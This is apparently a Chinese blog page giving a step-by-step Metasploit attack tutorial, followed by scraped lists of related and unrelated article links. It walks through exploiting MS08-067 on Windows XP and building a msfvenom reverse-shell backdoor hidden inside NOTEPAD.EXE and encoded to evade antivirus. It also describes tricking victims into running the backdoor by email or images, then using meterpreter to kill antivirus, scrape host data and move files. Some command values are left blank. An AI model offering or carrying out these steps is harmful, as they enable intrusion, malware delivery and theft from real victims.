阶段一：初步渗透

GO！

msfconsole

相关漏洞

msf > search platform: windows xp sp3

查看某个漏洞后，查看漏洞详细信息

msf > info exploit/windows/smb/ms08_067_netapi

选中漏洞

msf > use exploit/windows/smb/ms08_067_netapi

> set payload windows/meterpreter/bind_tcp

> set RHOST 192.168.0.108  (设置目标主机IP地址)

> exploit

如果目标主机有这个漏洞的话，你就可以控制它了；如果没有，尝试使用其他漏洞。

阶段二：后渗透（后门控制）

在Kali Linux上生成后门程序，然后把它发送给受害者，欺骗受害者运行（使用邮件、图片等等）。难点是需要过杀毒软件和防火墙，使用加密试图躲过杀毒软件。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT= -x NOTEPAD.EXE -e x86/jmp_call_additive -i  -k -f exe > my_backdoor.exe

如果不能运行换用其他加密方式。

查看帮助

man msfvenom

启动msfconsole并

use exploit/multi/handler

set LHOST 192.168.0.112

set LPORT

set payload windows/meterpreter/reverse_tcp

show options

exploit

等待受害者启动后门程序

阶段一补充

显示内建的文档

msf > help

msf > help search

查看可以利用的模块

msf > show

msf > show auxiliary

msf > show exploits

msf > show payloads

msf > show encoders

msf > show nops

搜索可以利用的漏洞

msf > search type:exploit

msf > search CVE-xxxx-xxx

msf > search cve:

msf > search name:wordpress

msf > search name:mysql

msf > search path:scada

msf > search platform:aix

msf > search type:post

msf > search windows type:exploit

使用一个漏洞

msf > use exploit/path/to/exploit_name

设置payload

msf > show payloads

msf > set payload path/to/payload

入侵

msf > exploit

阶段二补充

运行靶机shell

meterpreter > shell

从目标主机shell退出到 meterpreter

exit

从 meterpreter 退出到MSF框架

background

查看获得的shell

sessions -l

切换到id为1的shell

session  -i  

拿到shell后第一时间关掉目标杀毒软件

run killav

查看目标主机信息

sysinfo

将目标机器上的常见信息收集起来然后下载保存在本地

run scraper

访问文件系统

cd：切换目标目录；

cat：读取文件内容；

rm：删除文件；

edit：使用vim编辑文件

ls：获取当前目录下的文件；

mkdir：新建目录；

rmdir：删除目录；

上传/下载文件

upload/download  file

https://blog.csdn.net/qq_36119192/article/details/83215257#%E5%90%8E%E6%B8%97%E9%80%8F%E6%88%AA%E6%96%AD%C2%A0

Metasploit学习的更多相关文章

1. Metasploit学习之msf连接数据库

   kali使用metasploit开启数据服务: 首先,初次使用系统要初始化建立数据库msf3, 否则的话 /opt/metasploit/apps/pro/ui/config/databse.yml不 ...

2. metasploit学习之情报搜集

   3.1.被动信息搜集whois查询Netcraft nslookup>set type=mx>testfire.net Google Hacking 3.2 主动信息搜集 使用nmap进行 ...

3. Metasploit学习指南—基础篇

   Metasploit是一款强大的渗透测试平台,其中包括了很多渗透测试利器,本文简单介绍一下Metasploit的配置和基础的使用方法,主要包括以下几个方面: Metasploit的核心 基础的配置 M ...

4. Metasploit 学习

   知识准备:CCNA/CCNP基础计算机知识框架:操作系统.汇编.数据库.网络.安全 木马.灰鸽子.口令破解.用后门拷贝电脑文件 渗透测试工程师 penetration test engineer &l ...

5. metasploit 学习笔记-VULNERABILITY SCANNING

   使用漏洞扫描器会在网络上产生大量流量，因此如果你不希望被发现踪迹时，不要使用漏洞扫描器。 The Basic Vulnerability Scan 漏洞扫描器的质量很大程度上取决于它自带的漏洞特征库。 ...

6. Metasploit学习笔记之——情报搜集

   1.情报搜集 1.1外围信息搜索 1.1.1通过DNS和IP地址挖掘目标网络信息 (1)whois域名注冊信息查询(BT5.kali专有):root@kali:~# whois testfire.ne ...

7. Metasploit学习笔记（博主推荐）

   不多说,直接上干货! 连接后台的数据库,当然不是必须品. 连接数据库的好处:1.可以攻击和扫描的结果,保存起来      2.将一些搜索结果做个缓存 默认数据库是postgresql. 同时要注意的是 ...

8. Metasploit学习笔记

   原创博客,转载请注出处! 各位看官可参看——Metasploit实验操作 1.打开msf        msfconsole2.帮助选项:    msfconsole -h        显示在msf ...

9. Metasploit学习笔记（一） Samba服务 usermap_script安全漏洞相关信息

   一.Samba介绍 Samba是linux和unix系统上实现smb协议的一个免费软件,由客户机和服务器构成.SMB是一种在局域网上实现共享文件和打印机的协议.存在一个服务器,客户机通过该协议可以服务 ...

10. Metasploit学习笔记——强大的Meterpreter

    1. Meterpreter命令详解 1.1基本命令 使用Adobe阅读器渗透攻击实战案例打开的Meterpreter会话实验,靶机是WinXP.由于所有命令与书中显示一致,截图将书中命令记录下来. ...

随机推荐

1. 通过java实现对数据库的增删改查

   package cn.hncu; import java.sql.Connection;import java.sql.DriverManager;import java.sql.ResultSet; ...

2. Maven中settings.xml的配置项说明

   本文部分引用自:http://haohaoxuexi.iteye.com/blog/1827778 在Maven中提供了一个settings.xml文件来定义Maven的全局环境信息.这个文件会存在于 ...

3. 【JavaScript】 JS面向对象的模式与实践 （重点整治原型这个熊孩子 (/= _ =)/~┴┴ ）

   参考书籍 <JavaScript高级语言程序设计>—— Nicholas C.Zakas <你不知道的JavaScript>  —— KYLE SIMPSON   在JS的面向 ...

4. Win7&sol;Win8&period;1升级Win10后屏幕一直闪烁怎么办？

   有些用户在把Win7/Win8.1升级到Win10正式版后,发现屏幕一直不停闪烁,以至于无法正常使用.出现这种情况的原因可能有很多,微软社区的论坛审阅人Alex_Shen给出了一种解决方案:进入安全模 ...

5. keras笔记

   函数式模型 函数式模型算是本文档比较原创的词汇了,所以这里要说一下 在Keras 0.x中,模型其实有两种,一种叫Sequential,称为序贯模型,也就是单输入单输出,一条路通到底,层与层之间只有相 ...

6. 定时任务模块 schedule

   # coding:utf-8 from learning_python.Telegram_push.check_hardware import check_cpu import schedule im ...

7. InnoDB&colon; Error&colon; Table &quot&semi;mysql&quot&semi;&period;&quot&semi;innodb&lowbar;table&lowbar;stats&quot&semi; not found&period;

   问题:打开mysql错误日志时发现大量的如下错误 Error: Table "mysql"."innodb_table_stats" not found. In ...

8. 让sublime可以和visual studio一样自动在运算符前后添加空格的插件

   用过vs的人都知道,vs会自动在代码中运算符的前后加空格,比如 i=1; 换行后会自动变成i = 1; 开始觉得这个挺烦的,后来习惯了,发现这个功能还是挺好的,然代码更清晰. 最近换了sublimet ...

9. 【iCore4 双核心板&lowbar;ARM】例程十四：FATFS实验——文件操作

   实验现象: 核心代码: int main(void) { int i,j; FIL file; FATFS fatfs; static FRESULT res; unsigned ]; unsigne ...

10. Http File Server小工具

    一般情况下,在做一些测试(比如下载服务)的时候需要提供一个http文件下载服务. 下面这个轻量级的工具HFS可以在本地提供http服务: 官网地址传送门:Http File Server